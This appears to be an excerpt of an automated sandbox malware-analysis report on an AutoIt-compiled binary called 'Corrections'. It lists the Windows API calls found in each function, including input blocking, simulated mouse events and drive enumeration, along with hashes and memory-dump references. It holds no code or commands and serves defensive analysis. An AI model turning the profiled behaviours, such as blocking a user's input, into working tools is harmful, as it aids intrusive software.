                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 46bc885f1be51ab384fa986fc1d597b7f9dc0db74929f01d948058d573a53847
                                                                                                                                                                                                                                                                                            • Instruction ID: 67bfa08885b66e3633f94efa88b6bed84536173a355843f0c7383b319a993b3d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46bc885f1be51ab384fa986fc1d597b7f9dc0db74929f01d948058d573a53847
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BE048353102149FC710AF6DE444A5AF7DCAFA4771F018425F849D7351D670F9818B91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0098ECC7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dcaa5e8fb8973756b3b96c884dc312779e213e6e47da6b5f7115ee6b57525499
                                                                                                                                                                                                                                                                                            • Instruction ID: e0818b1f6ccf2e2912dde09e2cda61f8e4a83ca2ca79e49e4ba2579945a618a0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcaa5e8fb8973756b3b96c884dc312779e213e6e47da6b5f7115ee6b57525499
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D05BBD55810038F41D37384E3FB76150DE781751F448649B282C57D8E5DD9900A221
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0094075E), ref: 00940D4A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 16a1399330244c2c314af531860885a3e2c8a632e67c18cd7431b7f415f88116
                                                                                                                                                                                                                                                                                            • Instruction ID: af3dc0ce29b6229124933900461f5844c7c7688f3da28792175e1df9fc69a34d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16a1399330244c2c314af531860885a3e2c8a632e67c18cd7431b7f415f88116
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 009A358D
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 009A35A0
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 009A35AF
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 009A35CA
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 009A35D1
                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 009A3700
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 009A370E
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3755
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 009A3761
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009A379D
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37BF
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37D2
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37DD
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 009A37E6
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A37F5
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 009A37FE
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3805
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 009A3810
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3822
                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,009C0C04,00000000), ref: 009A3838
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 009A3848
                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 009A386E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 009A388D
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A38AF
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A3A9C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                            • Opcode ID: 7c0f7a7dcf530d46fda6dff0580eae5ae01a89494030061b129398d0bccbef4c
                                                                                                                                                                                                                                                                                            • Instruction ID: 97c331323173a949be02ef8ff42987dcc9232b28c8ef249e17ab0966e2bae156
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c0f7a7dcf530d46fda6dff0580eae5ae01a89494030061b129398d0bccbef4c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D028271910215EFDB14DF68CD89EAE7BB9EF49320F148218F915AB2A0DB749D01DFA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 009B7B67
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 009B7B98
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 009B7BA4
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 009B7BBE
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 009B7BCD
                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 009B7BF8
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 009B7C00
                                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 009B7C07
                                                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 009B7C16
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 009B7C1D
                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 009B7C68
                                                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 009B7C9A
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B7CBC
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: GetSysColor.USER32(00000012), ref: 009B7E5B
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: SetTextColor.GDI32(?,009B7B2D), ref: 009B7E5F
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: GetSysColorBrush.USER32(0000000F), ref: 009B7E75
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: GetSysColor.USER32(0000000F), ref: 009B7E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: GetSysColor.USER32(00000011), ref: 009B7E9D
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009B7EAB
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: SelectObject.GDI32(?,00000000), ref: 009B7EBC
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: SetBkColor.GDI32(?,?), ref: 009B7EC5
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: SelectObject.GDI32(?,?), ref: 009B7ED2
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 009B7EF1
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009B7F08
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B7E22: GetWindowLongW.USER32(?,000000F0), ref: 009B7F15
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f5f3a2368dcbae3ada24bc5eb96222d80794470a112fa77ebf43f80cf41b2127
                                                                                                                                                                                                                                                                                            • Instruction ID: 23c183b65d349da3cde2bd27048f1078f007baaa776c47d0c154e7d2f96fcec0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5f3a2368dcbae3ada24bc5eb96222d80794470a112fa77ebf43f80cf41b2127
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BA18C7101D301AFC7109FA4DE48AAABBA9FF89334F100B19F9A2961E0E775D9449B51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 009216B4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00962B07
                                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00962B40
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00962F85
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00921488,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 00921865
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00962FC1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00962FD8
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00962FEE
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00962FF9
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a060cca9271c699e809e2c9535d2b26b560a95d2c3e09bcce012cd3c85c6974
                                                                                                                                                                                                                                                                                            • Instruction ID: 90753beafd5ab6250962fa7316cf06ee7b0f65046cc9424c0240c0258ef8c005
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a060cca9271c699e809e2c9535d2b26b560a95d2c3e09bcce012cd3c85c6974
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01120E30209A12EFCB25CF14D984BB9BBE9FF44310F188569F4859B261C776EC92DB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 009A319B
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009A32C7
                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009A3306
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009A3316
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 009A335D
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 009A3369
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 009A33B2
                                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009A33C1
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 009A33D1
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009A33D5
                                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 009A33E5
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009A33EE
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 009A33F7
                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009A3423
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 009A343A
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 009A347A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009A348E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 009A349F
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 009A34D4
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 009A34DF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009A34EA
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 009A34F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                            • Opcode ID: 41cd9ddd8ee886d553398a0c974c9832a73e7834b8ce9ead0eb31c3c9e6e25ad
                                                                                                                                                                                                                                                                                            • Instruction ID: a2b739cdfcf6b1d401e89d0c72db5ef8c1fa528b66b1122922ab4b73c75e0c15
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41cd9ddd8ee886d553398a0c974c9832a73e7834b8ce9ead0eb31c3c9e6e25ad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADB17EB1A15215AFEB14DFA8DD49FAE7BA9EF49710F008214F914E7290D7B4AD00DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00995532
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,009BDC30,?,\\.\,009BDCD0), ref: 0099560F
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,009BDC30,?,\\.\,009BDCD0), ref: 0099577B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                            • Opcode ID: 134166eefe5ce302d145af1190834e30e08a2865e24aeb83891b3338213957a1
                                                                                                                                                                                                                                                                                            • Instruction ID: a336d71dee65715ea7971ff5da3e08615b31fbeb0899220dc40a30f3839be6e6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 134166eefe5ce302d145af1190834e30e08a2865e24aeb83891b3338213957a1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB612630608A45EFCF2BDFACED9197AB3A5EF84314B224415E406AB291C735DF42CB52
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 009B1BC4
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 009B1BD9
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 009B1BE0
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B1C35
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 009B1C55
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009B1C89
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B1CA7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009B1CB9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 009B1CCE
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 009B1CE1
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 009B1D3D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009B1D58
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009B1D6C
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 009B1D84
                                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 009B1DAA
                                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 009B1DC4
                                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 009B1DDB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 009B1E46
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
